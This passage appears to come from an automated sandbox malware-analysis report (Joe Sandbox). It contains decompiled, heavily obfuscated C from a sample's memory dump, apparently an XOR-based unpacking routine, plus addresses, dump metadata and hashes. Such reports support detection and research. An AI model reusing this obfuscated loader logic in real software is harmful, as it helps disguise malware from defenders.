                                                                                                                                                                                                                                                    					if(_v12 <=  *((intOrPtr*)(_a28 + 0x9c)) +  *((intOrPtr*)(_a28 + 0x10)) - 0x2674) {
                                                                                                                                                                                                                                                    						_v44 =  *0x01D1B261;
                                                                                                                                                                                                                                                    						while(_v44 < ((_v8 | _v20) ^  *(_a28 + 0xfc))) {
                                                                                                                                                                                                                                                    							_v8 =  *((intOrPtr*)(_a28 + 0x30)) - _v20 & 0x00002796 | _v8;
                                                                                                                                                                                                                                                    							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t806 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t128 = _t806 + 0xdc; // 0x8
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_a28 + 0x4c)) >= ( *(_a28 + 0xbadc51) &  *0x116d628 &  *_t128)) {
                                                                                                                                                                                                                                                    							if(_v12 < _v12 +  *((intOrPtr*)(_a28 + 0x9c)) - 0x2801) {
                                                                                                                                                                                                                                                    								 *(_a28 + 0x8c) =  *(_a28 + 0x8c) -  *((intOrPtr*)(_a28 + 0x50)) - 0x2796;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							if(_v12 >= (_v52 - _v40 | 0x000026d4)) {
                                                                                                                                                                                                                                                    								_t663 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    								_v76 = _t663;
                                                                                                                                                                                                                                                    								_t492 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    								_v72 = ( *(_a28 + 0xbadc29) | _v52) *  *(_t492 + 0xbadc71);
                                                                                                                                                                                                                                                    								_v68 = _v8 + 0x2598;
                                                                                                                                                                                                                                                    								_v64 = _v40 + 0x00002796 ^  *(_a28 + 0xf4);
                                                                                                                                                                                                                                                    								_v60 = _v48 *  *(_a28 + 0xbadbfd);
                                                                                                                                                                                                                                                    								_v56 = ( *(_a28 + 0xdc) | 0x00002622) &  *0x0116D6C4;
                                                                                                                                                                                                                                                    								_v40 = E010D2800(_v76, _v72, _v68, _v64, _v60, _v56);
                                                                                                                                                                                                                                                    								_t824 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    								_t165 = _t824 + 0xe4; // 0xc
                                                                                                                                                                                                                                                    								_v20 =  *_t165 * 0x2674 * _v20;
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_a28 + 0xd0)) = (_v8 & 0x000027b9 ^ _v20) +  *((intOrPtr*)(_a28 + 0xd0));
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t828 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t828 + 0x88)) = 0x1120140;
                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                    					while(_v32 < 0x564) {
                                                                                                                                                                                                                                                    						_v16 =  *((intOrPtr*)( *((intOrPtr*)(_a28 + 0x88)) + _v32 * 4));
                                                                                                                                                                                                                                                    						_t831 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t29 = _t831 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                    						_v16 = _v16 *  *_t29;
                                                                                                                                                                                                                                                    						_t683 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *0x116d6dc = ( *(_a28 + 0x78) ^  *(_t683 + 0xa4)) - 0x00079aca ^  *0x116d6dc;
                                                                                                                                                                                                                                                    						 *0x01D1B271 =  *((intOrPtr*)(0x1d1b271)) -  *0x0116D694;
                                                                                                                                                                                                                                                    						_t836 =  *0x116d6dc; // 0xe608d
                                                                                                                                                                                                                                                    						_t519 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t41 = _t519 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                    						_t689 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t689 + 0xac) = (_t836 ^  *(_a28 + 0xbadbfd)) - 0x001f219a |  *_t41;
                                                                                                                                                                                                                                                    						_t879 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t691 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t692 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t692 + 0xbadbfd) = ( *(_a28 + 0xac) ^  *(_t879 + 0xa4)) - 0x001a0e74 ^  *(_t691 + 0xbadbfd);
                                                                                                                                                                                                                                                    						_t693 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t51 = _t693 + 0xdc; // 0x8
                                                                                                                                                                                                                                                    						_t694 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t696 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t696 + 0xb8)) =  *((intOrPtr*)(_t694 + 0xb8)) -  *_t51 - 8;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a28 + 0xbadbdd)) =  *((intOrPtr*)(_a28 + 0xec)) +  *((intOrPtr*)(_a28 + 0xbadbdd)) - 0xe608d;
                                                                                                                                                                                                                                                    						_t880 =  *0x116d68c; // 0x14b95e
                                                                                                                                                                                                                                                    						_t534 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t535 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t535 + 0xa4) = _t880 -  *(_a28 + 0xb8) - 0x0018e850 |  *(_t534 + 0xa4);
                                                                                                                                                                                                                                                    						_t856 =  *0x116d64c; // 0x4b420
                                                                                                                                                                                                                                                    						 *((char*)( *((intOrPtr*)(_a28 + 0x90)) + _t856)) = _v16 >> 0x10;
                                                                                                                                                                                                                                                    						_t537 =  *0x116d64c; // 0x4b420
                                                                                                                                                                                                                                                    						 *0x116d64c = _t537 + 1;
                                                                                                                                                                                                                                                    						_t857 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t78 = _t857 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                    						 *((char*)( *((intOrPtr*)(_a28 + 0x90)) +  *_t78)) = _v16 >> 8;
                                                                                                                                                                                                                                                    						_t540 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t82 = _t540 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                    						_t860 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t860 + 0x5c)) =  *_t82 + 1;
                                                                                                                                                                                                                                                    						 *((char*)( *((intOrPtr*)(_a28 + 0x90)) +  *((intOrPtr*)(_a28 + 0x5c)))) = _v16;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a28 + 0x5c)) =  *((intOrPtr*)(_a28 + 0x5c)) + 1;
                                                                                                                                                                                                                                                    						_t544 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t94 = _t544 + 0x3c; // 0x161485
                                                                                                                                                                                                                                                    						_t864 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t95 = _t864 + 0xe4; // 0xc
                                                                                                                                                                                                                                                    						_t865 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t865 + 0xe4)) =  *_t94 +  *_t95 - 0x161485;
                                                                                                                                                                                                                                                    						 *(_a28 + 0xa4) =  *(_a28 + 0xa4) -  *((intOrPtr*)(0x1d1b261)) -  *0x01D1B1CD;
                                                                                                                                                                                                                                                    						_t873 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t553 =  *0x116d6a4; // 0x0
                                                                                                                                                                                                                                                    						 *0x116d6a4 = _t553 -  *((intOrPtr*)(_a28 + 0xec)) +  *((intOrPtr*)(_t873 + 0x10)) - 0xe6097;
                                                                                                                                                                                                                                                    						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a28 + 0x58)) = 0x1ecc;
                                                                                                                                                                                                                                                    					_t829 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t115 = _t829 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                    					_t679 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t679 + 0x58)) =  *_t115 - 0x4f6;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_v8 > _v12 + 0x2598) {
                                                                                                                                                                                                                                                    					if(_v8 < (_v12 ^ 0x000025a0)) {
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_a28 + 0xbadbed)) >= (_v8 - 0x2633) *  *(_a28 + 0xb4)) {
                                                                                                                                                                                                                                                    							 *0x01D1B1B1 = _v48 +  *((intOrPtr*)(0x1d1b1b1)) - 0x27b9;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t643 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t209 = _t643 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a28 + 0x58)) =  *((intOrPtr*)(_a28 + 0x58)) - ( *_t209 ^ 0x3b1dab9c);
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a28 + 0x88)) = 0x10ec430;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v52 != (_v8 ^ 0x00000d9a)) {
                                                                                                                                                                                                                                                    						_v36 = 0;
                                                                                                                                                                                                                                                    						while(_v36 < 0xea8) {
                                                                                                                                                                                                                                                    							 *0x0116D6A8 =  *(_a28 + 0xbadbfd) -  *((intOrPtr*)(_a28 + 0x74)) - 0x00114117 |  *0x0116D6A8;
                                                                                                                                                                                                                                                    							 *(_a28 + 0xac) = ( *(_a28 + 0xb8) ^ 0xfffbd10e) +  *(_a28 + 0xac);
                                                                                                                                                                                                                                                    							_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a28 + 0x88)) + _v36 * 4));
                                                                                                                                                                                                                                                    							_t770 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t255 = _t770 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                    							_v24 = _v24 *  *_t255;
                                                                                                                                                                                                                                                    							_t449 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t258 = _t449 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                    							 *(_a28 + 0xe4) =  *_t258 -  *((intOrPtr*)(_a28 + 0x7c)) + 0x2cda98c4 ^  *(_a28 + 0xe4);
                                                                                                                                                                                                                                                    							 *((char*)( *((intOrPtr*)(_a28 + 0x90)) +  *((intOrPtr*)(_a28 + 0x5c)))) = _v24 >> 0x10;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_a28 + 0x5c)) =  *((intOrPtr*)(_a28 + 0x5c)) + 1;
                                                                                                                                                                                                                                                    							 *((char*)( *((intOrPtr*)(_a28 + 0x90)) +  *((intOrPtr*)(_a28 + 0x5c)))) = _v24 >> 8;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_a28 + 0x5c)) =  *((intOrPtr*)(_a28 + 0x5c)) + 1;
                                                                                                                                                                                                                                                    							_t618 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t285 = _t618 + 0x90; // 0xd02000
                                                                                                                                                                                                                                                    							_t462 =  *0x116d64c; // 0x4b420
                                                                                                                                                                                                                                                    							 *((char*)( *_t285 + _t462)) = _v24;
                                                                                                                                                                                                                                                    							_t780 =  *0x116d64c; // 0x4b420
                                                                                                                                                                                                                                                    							 *0x116d64c = _t780 + 1;
                                                                                                                                                                                                                                                    							 *0x116d6e4 = ( *((intOrPtr*)(_a28 + 0x40)) -  *((intOrPtr*)(_a28 + 0xe0)) ^ 0x001ed730) +  *0x116d6e4;
                                                                                                                                                                                                                                                    							_t625 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t293 = _t625 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    							 *(_a28 + 0xe4) =  *_t293 +  *0x0116D66C +  *(_a28 + 0xe4) - 0xe6097;
                                                                                                                                                                                                                                                    							_t877 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *0x0116D6A8 =  *((intOrPtr*)(_t877 + 0x7c)) +  *(_a28 + 0xa4) - 0x0000000a |  *0x0116D6A8;
                                                                                                                                                                                                                                                    							 *(_a28 + 0xdc) =  *(_a28 + 0xdc) -  *0x116d6a4;
                                                                                                                                                                                                                                                    							_t634 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t317 = _t634 + 0xb0; // 0x0
                                                                                                                                                                                                                                                    							 *(_a28 + 0xa4) =  *(_a28 + 0xa4) ^  *_t317;
                                                                                                                                                                                                                                                    							_t477 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t323 = _t477 + 0xb0; // 0x0
                                                                                                                                                                                                                                                    							_t637 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *(_t637 + 0xb0) = ( *(_a28 + 0xe4) - 0xb) *  *_t323;
                                                                                                                                                                                                                                                    							_v36 = _v36 + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t569 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t326 = _t569 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                    						if( *_t326 >=  *((intOrPtr*)(_a28 + 0x40))) {
                                                                                                                                                                                                                                                    							_t571 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *(_a28 + 0x38) =  *((intOrPtr*)(_t571 + 0xbadbdd)) +  *((intOrPtr*)(_a28 + 0x3c)) +  *(_a28 + 0x38);
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_a28 + 0xe8)) = 0x116d5f0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v12 = _v12 ^ 0x00002598;
                                                                                                                                                                                                                                                    						_v28 = 0;
                                                                                                                                                                                                                                                    						while(_v28 < 0x2722) {
                                                                                                                                                                                                                                                    							_t419 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t345 = _t419 + 0x94; // 0xd02000
                                                                                                                                                                                                                                                    							_t420 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t349 = _t420 + 0x60; // 0xb67e4e55
                                                                                                                                                                                                                                                    							_t740 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t350 = _t740 + 0x94; // 0xd02000
                                                                                                                                                                                                                                                    							 *( *_t350 + _v28 * 4) =  *( *_t345 + _v28 * 4) ^  *_t349;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_a28 + 0x60)) =  *((intOrPtr*)(_a28 + 0x60)) +  *0x116d688;
                                                                                                                                                                                                                                                    							_t423 =  *0x116d668; // 0x79aca
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_a28 + 0x3c)) =  *((intOrPtr*)(_a28 + 0x3c)) - _t423 - 0x79aca;
                                                                                                                                                                                                                                                    							 *(_a28 + 0x8c) =  *(_a28 + 0xa4) +  *(_a28 + 0xdc) ^ 0x00000008 ^  *(_a28 + 0x8c);
                                                                                                                                                                                                                                                    							_t750 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t588 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *(_t588 + 0x7c) = ( *((intOrPtr*)(_a28 + 0x40)) - 0x1d118a) *  *(_t750 + 0x7c);
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_a28 + 0x10)) = ( *(_a28 + 0x38) ^ 0x00000001) +  *((intOrPtr*)(_a28 + 0x10));
                                                                                                                                                                                                                                                    							_t757 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *0x116d6a4 = ( *((intOrPtr*)(0x116d66c)) +  *((intOrPtr*)(_t757 + 0xbadc71)) - 0xa) *  *0x116d6a4;
                                                                                                                                                                                                                                                    							_t596 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t393 = _t596 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    							_t759 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t759 + 0xec)) = ( *(_a28 + 0x38) ^ 0x00000001) +  *_t393;
                                                                                                                                                                                                                                                    							_v28 = _v28 + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8 - 8;
                                                                                                                                                                                                                                                    			}











































































                                                                                                                                                                                                                                                    0x010e7450
                                                                                                                                                                                                                                                    0x010e7459
                                                                                                                                                                                                                                                    0x010e7465
                                                                                                                                                                                                                                                    0x010e7470
                                                                                                                                                                                                                                                    0x010e7479
                                                                                                                                                                                                                                                    0x010e7485
                                                                                                                                                                                                                                                    0x010e748b
                                                                                                                                                                                                                                                    0x010e7497
                                                                                                                                                                                                                                                    0x010e77c6
                                                                                                                                                                                                                                                    0x010e795e
                                                                                                                                                                                                                                                    0x010e796c
                                                                                                                                                                                                                                                    0x010e79a4
                                                                                                                                                                                                                                                    0x010e7969
                                                                                                                                                                                                                                                    0x010e7969
                                                                                                                                                                                                                                                    0x010e77cc
                                                                                                                                                                                                                                                    0x010e77ec
                                                                                                                                                                                                                                                    0x010e77f2
                                                                                                                                                                                                                                                    0x010e77ff
                                                                                                                                                                                                                                                    0x010e7923
                                                                                                                                                                                                                                                    0x010e7948
                                                                                                                                                                                                                                                    0x010e7948
                                                                                                                                                                                                                                                    0x010e7805
                                                                                                                                                                                                                                                    0x010e7813
                                                                                                                                                                                                                                                    0x010e7819
                                                                                                                                                                                                                                                    0x010e781f
                                                                                                                                                                                                                                                    0x010e783b
                                                                                                                                                                                                                                                    0x010e7848
                                                                                                                                                                                                                                                    0x010e7854
                                                                                                                                                                                                                                                    0x010e7869
                                                                                                                                                                                                                                                    0x010e787f
                                                                                                                                                                                                                                                    0x010e789f
                                                                                                                                                                                                                                                    0x010e78c2
                                                                                                                                                                                                                                                    0x010e78c5
                                                                                                                                                                                                                                                    0x010e78cb
                                                                                                                                                                                                                                                    0x010e78d9
                                                                                                                                                                                                                                                    0x010e7904
                                                                                                                                                                                                                                                    0x010e7904
                                                                                                                                                                                                                                                    0x010e790b
                                                                                                                                                                                                                                                    0x010e794e
                                                                                                                                                                                                                                                    0x010e749d
                                                                                                                                                                                                                                                    0x010e749d
                                                                                                                                                                                                                                                    0x010e74a3
                                                                                                                                                                                                                                                    0x010e74ad
                                                                                                                                                                                                                                                    0x010e74bf
                                                                                                                                                                                                                                                    0x010e74db
                                                                                                                                                                                                                                                    0x010e74de
                                                                                                                                                                                                                                                    0x010e74e7
                                                                                                                                                                                                                                                    0x010e74eb
                                                                                                                                                                                                                                                    0x010e74f9
                                                                                                                                                                                                                                                    0x010e7514
                                                                                                                                                                                                                                                    0x010e753d
                                                                                                                                                                                                                                                    0x010e754e
                                                                                                                                                                                                                                                    0x010e755e
                                                                                                                                                                                                                                                    0x010e7563
                                                                                                                                                                                                                                                    0x010e7569
                                                                                                                                                                                                                                                    0x010e756f
                                                                                                                                                                                                                                                    0x010e7588
                                                                                                                                                                                                                                                    0x010e75a0
                                                                                                                                                                                                                                                    0x010e75b2
                                                                                                                                                                                                                                                    0x010e75b8
                                                                                                                                                                                                                                                    0x010e75c4
                                                                                                                                                                                                                                                    0x010e75ca
                                                                                                                                                                                                                                                    0x010e75d3
                                                                                                                                                                                                                                                    0x010e75ea
                                                                                                                                                                                                                                                    0x010e75f0
                                                                                                                                                                                                                                                    0x010e7621
                                                                                                                                                                                                                                                    0x010e7638
                                                                                                                                                                                                                                                    0x010e764b
                                                                                                                                                                                                                                                    0x010e765f
                                                                                                                                                                                                                                                    0x010e7664
                                                                                                                                                                                                                                                    0x010e767a
                                                                                                                                                                                                                                                    0x010e7680
                                                                                                                                                                                                                                                    0x010e7683
                                                                                                                                                                                                                                                    0x010e768b
                                                                                                                                                                                                                                                    0x010e7696
                                                                                                                                                                                                                                                    0x010e769c
                                                                                                                                                                                                                                                    0x010e76a8
                                                                                                                                                                                                                                                    0x010e76ab
                                                                                                                                                                                                                                                    0x010e76b0
                                                                                                                                                                                                                                                    0x010e76b6
                                                                                                                                                                                                                                                    0x010e76bc
                                                                                                                                                                                                                                                    0x010e76d1
                                                                                                                                                                                                                                                    0x010e76e0
                                                                                                                                                                                                                                                    0x010e76e3
                                                                                                                                                                                                                                                    0x010e76e8
                                                                                                                                                                                                                                                    0x010e76eb
                                                                                                                                                                                                                                                    0x010e76f1
                                                                                                                                                                                                                                                    0x010e76fe
                                                                                                                                                                                                                                                    0x010e7704
                                                                                                                                                                                                                                                    0x010e7744
                                                                                                                                                                                                                                                    0x010e775c
                                                                                                                                                                                                                                                    0x010e776d
                                                                                                                                                                                                                                                    0x010e7774
                                                                                                                                                                                                                                                    0x010e74bc
                                                                                                                                                                                                                                                    0x010e74bc
                                                                                                                                                                                                                                                    0x010e7781
                                                                                                                                                                                                                                                    0x010e7788
                                                                                                                                                                                                                                                    0x010e778e
                                                                                                                                                                                                                                                    0x010e7796
                                                                                                                                                                                                                                                    0x010e779c
                                                                                                                                                                                                                                                    0x010e779c
                                                                                                                                                                                                                                                    0x010e79b5
                                                                                                                                                                                                                                                    0x010e79c6
                                                                                                                                                                                                                                                    0x010e7a19
                                                                                                                                                                                                                                                    0x010e7a3b
                                                                                                                                                                                                                                                    0x010e7a3b
                                                                                                                                                                                                                                                    0x010e79c8
                                                                                                                                                                                                                                                    0x010e79c8
                                                                                                                                                                                                                                                    0x010e79ce
                                                                                                                                                                                                                                                    0x010e79e5
                                                                                                                                                                                                                                                    0x010e79eb
                                                                                                                                                                                                                                                    0x010e79eb
                                                                                                                                                                                                                                                    0x010e7a4c
                                                                                                                                                                                                                                                    0x010e7a52
                                                                                                                                                                                                                                                    0x010e7a64
                                                                                                                                                                                                                                                    0x010e7aab
                                                                                                                                                                                                                                                    0x010e7ad5
                                                                                                                                                                                                                                                    0x010e7aea
                                                                                                                                                                                                                                                    0x010e7aed
                                                                                                                                                                                                                                                    0x010e7af6
                                                                                                                                                                                                                                                    0x010e7afa
                                                                                                                                                                                                                                                    0x010e7b05
                                                                                                                                                                                                                                                    0x010e7b0d
                                                                                                                                                                                                                                                    0x010e7b28
                                                                                                                                                                                                                                                    0x010e7b43
                                                                                                                                                                                                                                                    0x010e7b52
                                                                                                                                                                                                                                                    0x010e7b6a
                                                                                                                                                                                                                                                    0x010e7b79
                                                                                                                                                                                                                                                    0x010e7b7c
                                                                                                                                                                                                                                                    0x010e7b82
                                                                                                                                                                                                                                                    0x010e7b88
                                                                                                                                                                                                                                                    0x010e7b90
                                                                                                                                                                                                                                                    0x010e7b93
                                                                                                                                                                                                                                                    0x010e7b9c
                                                                                                                                                                                                                                                    0x010e7bc6
                                                                                                                                                                                                                                                    0x010e7bd4
                                                                                                                                                                                                                                                    0x010e7bda
                                                                                                                                                                                                                                                    0x010e7bf9
                                                                                                                                                                                                                                                    0x010e7c17
                                                                                                                                                                                                                                                    0x010e7c3d
                                                                                                                                                                                                                                                    0x010e7c55
                                                                                                                                                                                                                                                    0x010e7c66
                                                                                                                                                                                                                                                    0x010e7c73
                                                                                                                                                                                                                                                    0x010e7c84
                                                                                                                                                                                                                                                    0x010e7c97
                                                                                                                                                                                                                                                    0x010e7c9c
                                                                                                                                                                                                                                                    0x010e7ca3
                                                                                                                                                                                                                                                    0x010e7ca9
                                                                                                                                                                                                                                                    0x010e7a61
                                                                                                                                                                                                                                                    0x010e7a61
                                                                                                                                                                                                                                                    0x010e7cbc
                                                                                                                                                                                                                                                    0x010e7cc5
                                                                                                                                                                                                                                                    0x010e7ccf
                                                                                                                                                                                                                                                    0x010e7ce8
                                                                                                                                                                                                                                                    0x010e7d01
                                                                                                                                                                                                                                                    0x010e7cd1
                                                                                                                                                                                                                                                    0x010e7cd4
                                                                                                                                                                                                                                                    0x010e7cd4
                                                                                                                                                                                                                                                    0x010e7d0d
                                                                                                                                                                                                                                                    0x010e7d10
                                                                                                                                                                                                                                                    0x010e7d22
                                                                                                                                                                                                                                                    0x010e7d2f
                                                                                                                                                                                                                                                    0x010e7d34
                                                                                                                                                                                                                                                    0x010e7d3d
                                                                                                                                                                                                                                                    0x010e7d45
                                                                                                                                                                                                                                                    0x010e7d48
                                                                                                                                                                                                                                                    0x010e7d4e
                                                                                                                                                                                                                                                    0x010e7d57
                                                                                                                                                                                                                                                    0x010e7d69
                                                                                                                                                                                                                                                    0x010e7d6c
                                                                                                                                                                                                                                                    0x010e7d81
                                                                                                                                                                                                                                                    0x010e7dae
                                                                                                                                                                                                                                                    0x010e7dd0
                                                                                                                                                                                                                                                    0x010e7de3
                                                                                                                                                                                                                                                    0x010e7de9
                                                                                                                                                                                                                                                    0x010e7e10
                                                                                                                                                                                                                                                    0x010e7e29
                                                                                                                                                                                                                                                    0x010e7e41
                                                                                                                                                                                                                                                    0x010e7e50
                                                                                                                                                                                                                                                    0x010e7e56
                                                                                                                                                                                                                                                    0x010e7e5c
                                                                                                                                                                                                                                                    0x010e7e62
                                                                                                                                                                                                                                                    0x010e7d1f
                                                                                                                                                                                                                                                    0x010e7d1f
                                                                                                                                                                                                                                                    0x010e7d22
                                                                                                                                                                                                                                                    0x010e7a4c
                                                                                                                                                                                                                                                    0x010e7e78

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "'
                                                                                                                                                                                                                                                    • API String ID: 0-1130488244
                                                                                                                                                                                                                                                    • Opcode ID: f7b5bb5fd65c21a28f8c2142259bd1668baa17e75801d4eb64f6c966e1c12df5
                                                                                                                                                                                                                                                    • Instruction ID: f21d798c3c717d3bc5effd33509f7204fba77a10e3603fb44423c019d0e2393b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7b5bb5fd65c21a28f8c2142259bd1668baa17e75801d4eb64f6c966e1c12df5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD622974600149CFDB1CCF58D594BA9BBB2FB88308F15827AD9599B79AC735E842CF80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010DCDF6(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                    				signed int _t172;
                                                                                                                                                                                                                                                    				signed int _t175;
                                                                                                                                                                                                                                                    				signed int _t178;
                                                                                                                                                                                                                                                    				signed int* _t179;
                                                                                                                                                                                                                                                    				signed int _t195;
                                                                                                                                                                                                                                                    				signed int _t199;
                                                                                                                                                                                                                                                    				signed int _t202;
                                                                                                                                                                                                                                                    				void* _t203;
                                                                                                                                                                                                                                                    				void* _t206;
                                                                                                                                                                                                                                                    				signed int _t209;
                                                                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                                                                    				signed int _t225;
                                                                                                                                                                                                                                                    				unsigned int* _t240;
                                                                                                                                                                                                                                                    				signed char _t242;
                                                                                                                                                                                                                                                    				signed int* _t250;
                                                                                                                                                                                                                                                    				unsigned int* _t256;
                                                                                                                                                                                                                                                    				signed int* _t257;
                                                                                                                                                                                                                                                    				signed char _t259;
                                                                                                                                                                                                                                                    				long _t262;
                                                                                                                                                                                                                                                    				signed int* _t265;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				 *(_a4 + 4) = 0;
                                                                                                                                                                                                                                                    				_t262 = 0xc000000d;
                                                                                                                                                                                                                                                    				 *(_a4 + 8) = 0;
                                                                                                                                                                                                                                                    				 *(_a4 + 0xc) = 0;
                                                                                                                                                                                                                                                    				_t242 = _a12;
                                                                                                                                                                                                                                                    				if((_t242 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                    					_t262 = 0xc000008f;
